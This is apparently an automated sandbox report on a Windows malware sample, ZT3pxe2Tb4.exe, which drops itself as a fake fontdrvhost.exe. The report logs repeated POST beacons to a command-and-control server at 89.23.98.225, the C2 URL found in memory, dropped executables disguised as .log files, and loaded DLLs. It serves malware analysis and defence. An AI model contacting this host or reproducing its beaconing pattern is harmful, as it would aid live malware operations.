                        HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                        Content-Type: application/octet-stream
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                        Host: 89.23.98.225
                        Content-Length: 344
                        Expect: 100-continue
                        Connection: Keep-Alive
                        Source: global traffic
                        HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                        Content-Type: application/octet-stream
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                        Host: 89.23.98.225
                        Content-Length: 344
                        Expect: 100-continue
                        Connection: Keep-Alive
                        Source: global traffic
                        HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                        Content-Type: application/octet-stream
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: 89.23.98.225
                        Content-Length: 344
                        Expect: 100-continue
                        Connection: Keep-Alive
                        Source: unknown
                        TCP traffic detected without corresponding DNS query: 89.23.98.225
                        Source: unknown
                        HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                        Content-Type: application/octet-stream
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                        Host: 89.23.98.225
                        Content-Length: 344
                        Expect: 100-continue
                        Connection: Keep-Alive
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:37:01 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:37:10 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:37:19 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:37:23 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:37:32 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:37:37 GMT
                        Content-Type: text/html
                        Content-Length: 146
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:37:41 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:37:55 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:38:03 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:38:15 GMT
                        Content-Type: text/html
                        Content-Length: 146
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:38:30 GMT
                        Content-Type: text/html
                        Content-Length: 146
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:38:43 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global traffic
                        HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Fri, 29 Mar 2024 06:38:55 GMT
                        Content-Type: text/html
                        Content-Length: 548
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: fontdrvhost.exe, 00000008.00000002.1704980568.0000000003102000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1796124572.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.1883168171.0000000003347000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1932041291.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2017458339.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2120982731.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2116613612.0000000003855000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2490608916.000000000363C000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://89.23.98.225
                        Source: fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generato
                        Source: ZT3pxe2Tb4.exe, 00000000.00000002.1647722543.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000008.00000002.1704980568.0000000003102000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1796124572.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.1883168171.0000000003347000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1932041291.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2017458339.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2120982731.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2116613612.0000000003855000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2490608916.000000000363C000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AFOsBjYP.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                        Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AaPSReOe.log F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                        Source: DnshUSLJ.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: tAOrkGQb.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: SKewgrff.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: IbKgwPay.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: zsrQNmVQ.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: pJXAdKPi.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: ZT3pxe2Tb4.exe, 00000000.00000002.1670366434.000000001BFAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs ZT3pxe2Tb4.exe
                        Source: ZT3pxe2Tb4.exe, 00000000.00000000.1607054032.0000000000D64000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs ZT3pxe2Tb4.exe
                        Source: ZT3pxe2Tb4.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs ZT3pxe2Tb4.exe
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: version.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: ktmw32.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: ntmarta.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: propsys.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: dlnashext.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: wpdshext.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: edputil.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: urlmon.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: iertutil.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: bcp47langs.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: slc.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: sppc.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                        Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                        Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                        Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                        Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                        Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
